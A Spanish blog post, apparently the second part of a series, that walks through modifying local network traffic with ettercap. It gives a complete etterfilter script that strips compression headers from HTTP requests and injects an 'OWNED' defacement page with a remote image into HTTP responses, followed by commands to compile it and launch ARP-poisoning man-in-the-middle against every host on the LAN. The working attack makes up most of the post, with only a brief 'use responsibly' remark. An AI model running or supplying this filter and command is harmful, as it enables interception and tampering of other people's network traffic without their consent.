Modificando el tráfico de la red (Parte II)

En este item solo crearemos un filtro que nos permita modificar un sitio a nivel local, osea que jamás estarás interviniendo el sitio web, sino que solo estarás modificando los paquetes de datos de la LAN.

El filtro usado en este post lo pueden encontrar en cualquier parte de internet y para mayor información sobre como crear filtros para ettercap pueden revisar el manual de etterfilter escribiendo el siguiente comando en la consola:

$ man etterfilter

bueno en la primera parte nos dedicamos solo a la captura de datos, esta vez modificaremos el tráfico, por eso manos a la obra.

1.- abrimos una consola en modo super usuario y ejecutamos el siguiente comando:

# gedit

2.- Se nos abrirá el editor de texto y escribimos el siguiente codigo:

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, “Accept-Encoding”)) {
replace(“Accept-Encoding”, “Accept-Rubbish!”);
# note: replacement string is same length as original string
msg(“zapped Accept-Encoding!\n”);
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace(“<head>”, “<head> <title> Anger Rising </title> <body><font color=white  size=10> OWNED</font><body bgcolor=”#000000″ text=”#ffffff” link=”#ffff33″ alink=”#ffffcc” alink=”ffff00″> <img src=”http://th03.deviantart.net/fs51/150/f/2009/260/4/2/I__m_your_father_mtfkf____by_hexthor.jpg&#8221; align=center></body> </head>” “);
msg(“Filter Ran.\n”);
}

3.- Guardamos el filtro como defacinglocal.filter

4.- Compilamos el filtro con el siguiente comando:

# etterfilter defacinglocal.filter -o defacinglocal.ef

5.- y finalmente lo ejecutamos:

# ettercap -T -q -F defacinglocal.ef -M ARP // //

donde:

  • -T significa modo texto
  • -q modo quiet o silencioso
  • -F  usar filtro
  • -M ARP Hacer uso de ataque Man In The Middle con envenenamiento ARP
  • // // El ataque va dirigido a toda la red

NOTA: este tipo de ataque es facilmente detectable, es cosa que en la maquina victima verifiquen las tablas arp para saber tu direccion de red, asi que usarlo con responsabilidad.

Fuente: HackXcraK.es

Parte I

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: